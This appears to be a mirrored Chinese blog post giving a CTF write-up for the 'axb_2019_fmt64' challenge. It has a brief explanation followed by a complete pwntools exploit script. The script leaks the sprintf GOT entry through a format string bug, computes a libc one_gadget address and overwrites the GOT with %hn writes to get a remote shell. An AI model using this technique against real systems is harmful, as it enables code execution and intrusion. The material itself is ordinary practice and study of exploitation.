zoukankan      html  css  js  c++  java
  • axb_2019_fmt64

    exp

    有格式化字符串漏洞,泄露got表地址,改sprintf为one_gadget,当函数再次调用sprintf即可拿shell。(使用格式化漏洞任意写的时候注意printf已经先输出了9个字符,要减去)

    from pwn import *
    
    #context.log_level = 'debug'
    
    #io = process('./idaidg/linux_server64')
    io = remote('node3.buuoj.cn',29548)
    #io = process('axb_2019_fmt64')
    elf = ELF('./axb_2019_fmt64')
    #libc = elf.libc
    libc = ELF('./libc/libc-2.23.so')
    
    one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
    sprintf_got = elf.got['sprintf']
    
    payload = '%9$saaaa'
    payload += p64(sprintf_got)
    
    io.recvuntil("Please tell me:")
    io.sendline(payload)
    
    sprintf_addr = u64(io.recvuntil('x7f')[-6:].ljust(8,'x00'))
    
    print "sprintf_addr:"+hex(sprintf_addr)
    
    libcbase = sprintf_addr - libc.symbols['sprintf']
    one_gadget = libcbase + one_gadget[0]
    
    print "one_gadget:"+hex(one_gadget)
    
    payload = ''
    payload += '%' + str((one_gadget % 0x10000) - 9) + 'c%12$hn'
    payload += '%' + str(((one_gadget >> 16) % 0x10000) - (one_gadget % 0x10000)) + 'c%13$hn'
    payload = payload.ljust(0x20,'x00')
    payload += p64(sprintf_got) + p64(sprintf_got + 2)
    
    print 'payload:'+payload
    
    io.sendline(payload)
    
    io.interactive()
    
    
  • 相关阅读:
    Linux之权限
    Linux基础和文件操作
    linux之用户、用户组、用户提权
    linux之Vim使用
    java面向对象
    eclipse首选项常用设置
    eclipse中添加项目运行程序
    eclipse的基本配置
    eclipse安装
    Jemter压力测试核心流程
  • 原文地址:https://www.cnblogs.com/luoleqi/p/13413891.html
Copyright © 2011-2022 走看看